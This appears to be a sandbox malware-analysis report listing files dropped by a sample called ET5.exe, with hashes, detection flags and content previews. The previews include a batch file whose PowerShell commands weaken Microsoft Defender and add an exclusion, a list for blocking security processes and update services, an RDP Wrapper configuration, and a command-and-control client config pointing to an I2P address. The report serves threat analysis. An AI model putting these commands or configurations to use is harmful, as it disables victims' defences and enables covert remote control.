                  File Type:Generic INItialization configuration [SLPolicy]
                  Category:dropped
                  Size (bytes):456534
                  Entropy (8bit):5.450314708570292
                  Encrypted:false
                  SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                  MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                  SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                  SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                  SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                  Malicious:false
                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):10480965
                  Entropy (8bit):6.710750822103746
                  Encrypted:false
                  SSDEEP:196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
                  MD5:458F2D710689EA3CF61D5CD97C6B2470
                  SHA1:BA71901A29F77715A3DC952578F6D249B944FE26
                  SHA-256:47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
                  SHA-512:C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
                  Malicious:false
                  Preview:.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):64
                  Entropy (8bit):0.34726597513537405
                  Encrypted:false
                  SSDEEP:3:Nlll:Nll
                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                  Malicious:false
                  Preview:@...e...........................................................
                  Process:C:\Users\user\Desktop\ET5.exe
                  File Type:DOS batch file, ASCII text
                  Category:dropped
                  Size (bytes):259
                  Entropy (8bit):4.933902901538645
                  Encrypted:false
                  SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                  MD5:261A842203ADB67547C83DE132C7A076
                  SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                  SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                  SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                  Malicious:true
                  Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Users\user\Desktop\ET5.exe
                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):98304
                  Entropy (8bit):6.298274541598319
                  Encrypted:false
                  SSDEEP:1536:EJm0mRQUtrg7DYy+F2aQuuvL7V0Y91n1ot:EJmjSUtMiF2suvVr11ot
                  MD5:319865D78CC8DF6270E27521B8182BFF
                  SHA1:716E70B00AA2D154367028DE896C7D76C9D24350
                  SHA-256:A78945E7532ECDB29B9448A1F3EEF2F45EC2F01CA070B9868258CBCD31EAC23F
                  SHA-512:78CD48C8BA558DFFC204A70DBFF13889984F80F268A715FEC7FC018A7718A11822975F775D44A927C5815AA2CCC0D78502264354BF5D8C0502B5A0A323948611
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 67%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.....|.................@....................................#7....`... ..............................................................................................................a..(....................... ............................text...............................`..`.data...............................@....rdata...R... ...T..................@..@.pdata...............R..............@..@.xdata...............\..............@..@.bss....0................................idata...............f..............@....CRT....`............z..............@....tls.................|..............@....reloc...............~..............@..B................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):3745
                  Entropy (8bit):5.502436715800604
                  Encrypted:false
                  SSDEEP:96:i68J9VqODT0HU0Hn0H1EO0He0H+kQHR36kPiOdW0HMVVHaHn0HMttHMn:/OTTT000H0eO0+0TQxKkPiOdW0AV6H0n
                  MD5:E53F3A65C3D602EA6ACA952C2ADBBE4B
                  SHA1:5755BFA1B01A1FF207571322444C19647D883352
                  SHA-256:477900E1267F2CE42E8AE0FFB527F8B92A5B81FDD6E935987CD81686CCE5FE36
                  SHA-512:8827632E198D96AC110A6453D41D6427596FB1BDEFD0A39B362F161009F5E4F968A494CF529D33CFCEA8C198A607F659A65A38BAF18F799350B5C44022BDD144
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\installer.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (fs_path_expand) -> Done(path=%PUBLIC%,xpath=C:\Users\Public,xpath_sz=15)..[I] (fs_dir_create) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,recursive=1)..[D] (fs_attr_get) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1
                  Process:C:\Users\user\Desktop\ET5.exe
                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):10669056
                  Entropy (8bit):7.443816651911507
                  Encrypted:false
                  SSDEEP:98304:RzfenAfcSl0KeEoTnZ4gBu8P1TAB3ruLIb9ly73Ji3vhqNDMmL98fjd3KiY9LeOm:gA/0F5PdyrlSQ5qNDMmYjd3RY9Lesc
                  MD5:2F829F1CB631D234C54F2E6C6F72EB57
                  SHA1:BD76CB633ED42E9E94580E1D995AF2E36D9E1A11
                  SHA-256:09B3B106A22BCB2DF3F09C7A1A082F2FE62927C337C183D3813D21513FB3FA43
                  SHA-512:71C0B077AA63B6DF3A1C2E0A1A0E179DA0466518F2BE6E10871642F03B3B8F63318258DA8C93B78E0CA45C753C3A6524751187FF3D5952D336BE3461651D0CD9
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*......................@.............................@.......6....`... ................................................................d............0..............................`...(....................................................text...............................`..`.data....J.......L..................@....rdata...^...P...`...<..............@..@.pdata..d...........................@..@.xdata..............................@..@.bss....p...............................idata.............................@....CRT....`..........................@....tls......... .....................@....reloc.......0.....................@..B................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe
                  File Type:Generic INItialization configuration [svc]
                  Category:dropped
                  Size (bytes):195
                  Entropy (8bit):4.692426693515089
                  Encrypted:false
                  SSDEEP:3:PCLtupyhdA5A1XJy31ae0CYUAM9t2X0DwL1Uy/5ookVqEfokH2VmM74osLSgRUYp:PItZLJ4aZC9b/EhUyBjZBkWESqj
                  MD5:E025B58CB2D118FAFAE00850EE91C5F9
                  SHA1:DD23CE328F593AF74455F2C2F805B662466A1205
                  SHA-256:897FC59CEDFBCAFDB9D0BEFEE9FC21A1B4C61259992A40F1986921E406E36340
                  SHA-512:5CD3F72CB1FF5754F3329A1EF1C7D45826BE48540AAD60FC55B91C7EFDCBBEF8B6BEB66ED7E2CF338348CE3C43DE2C8B2C0E72C681A8C314ADBAE0F844C7B7EF
                  Malicious:false
                  Preview:[app]..MsMpEng.exe=1..MsSense.exe=1..SenseIR.exe=1..SenseNdr.exe=1..SenseCncProxy.exe=1..SenseSampleUploader.exe=1..[svc]..wuauserv=1..DoSvc=1..UsoSvc=1..WaaSMedicSvc=1..[ip4]..54.243.255.141=1..
                  Process:C:\Users\user\AppData\Local\Temp\hstmhco83f64lehv4q0wbzqj3o.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):25052
                  Entropy (8bit):5.25163415683287
                  Encrypted:false
                  SSDEEP:768:abbEbNQ6s69WS8vv88o88888888888888j8888888888e88888880888888888AG:P
                  MD5:90246B5435654D62BDE97124534F677D
                  SHA1:471CFFF5ED6AC74296F5A3FCD2EA7E20E5CA5B1D
                  SHA-256:82AF4A3338419B0128EFCF8EF589FB3A88EAFF0530BEFADBE193539F9E133074
                  SHA-512:496E17E6BFC4FBAE60A054397751066B84176180DCDBC168D0E5B34ED1087A529CA60087F87CD2D06653EF337B160E80785A9D2A9A00730DF673264D2B6C0D09
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\user\AppData\Local\Temp\wfpblk.log)..[I] (debug_init) -> Done..[I] (fs_file_write) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,mode=wb,buf_sz=195)..[I] (fs_file_read) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini,buf_sz=195)..[I] (ini_load) -> Done(path=C:\Users\user\AppData\Local\Temp\wfpblk.ini)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=[System Process],err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=System,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=Registry,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=smss.exe,err=00000003)..[D] (ini_get_sec) -> Done(name=app)..[W] (ini_get_var) -> Failed(sec=app,name=csrss.exe,err=00000003)..[D] (ini_get_sec) ->
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):92672
                  Entropy (8bit):6.229119632298774
                  Encrypted:false
                  SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                  MD5:7FEA520E80E7A73252F2A5C204BBF820
                  SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                  SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                  SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):75977
                  Entropy (8bit):7.8696816318811385
                  Encrypted:false
                  SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                  MD5:E53A179BB45CD7EDD8371740D65076BD
                  SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                  SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                  SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                  Malicious:false
                  Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:Generic INItialization configuration [SLPolicy]
                  Category:dropped
                  Size (bytes):456534
                  Entropy (8bit):5.450314708570292
                  Encrypted:false
                  SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                  MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                  SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                  SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                  SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                  Malicious:false
                  Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):91136
                  Entropy (8bit):6.2041507656664825
                  Encrypted:false
                  SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                  MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                  SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                  SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                  SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):2.0
                  Encrypted:false
                  SSDEEP:3:9:9
                  MD5:006F29D8E822B9241020AEC2495EF819
                  SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                  SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                  SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                  Malicious:false
                  Preview:wgNj
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):8568
                  Entropy (8bit):4.958673415285098
                  Encrypted:false
                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                  MD5:27535CEE6740DFC50A78A0322415E67C
                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                  Malicious:false
                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):37376
                  Entropy (8bit):5.7181012847214445
                  Encrypted:false
                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):105984
                  Entropy (8bit):6.285421743969757
                  Encrypted:false
                  SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                  MD5:6E01ED70D02CE47F4D27762A9E949DEE
                  SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                  SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                  SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):9146880
                  Entropy (8bit):6.674868432808522
                  Encrypted:false
                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                  MD5:676064A5CC4729E609539F9C9BD9D427
                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:Generic INItialization configuration [cnccli]
                  Category:dropped
                  Size (bytes):213
                  Entropy (8bit):5.129024990254676
                  Encrypted:false
                  SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                  MD5:7D88563AD41BAF4026CFC5D098CBF40D
                  SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                  SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                  SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                  Malicious:false
                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.193969228624904
                  Encrypted:false
                  SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                  MD5:EC9499EE84ED09B77BE0A35EC87B781C
                  SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                  SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                  SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.25860377459178
                  Encrypted:false
                  SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                  MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                  SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                  SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
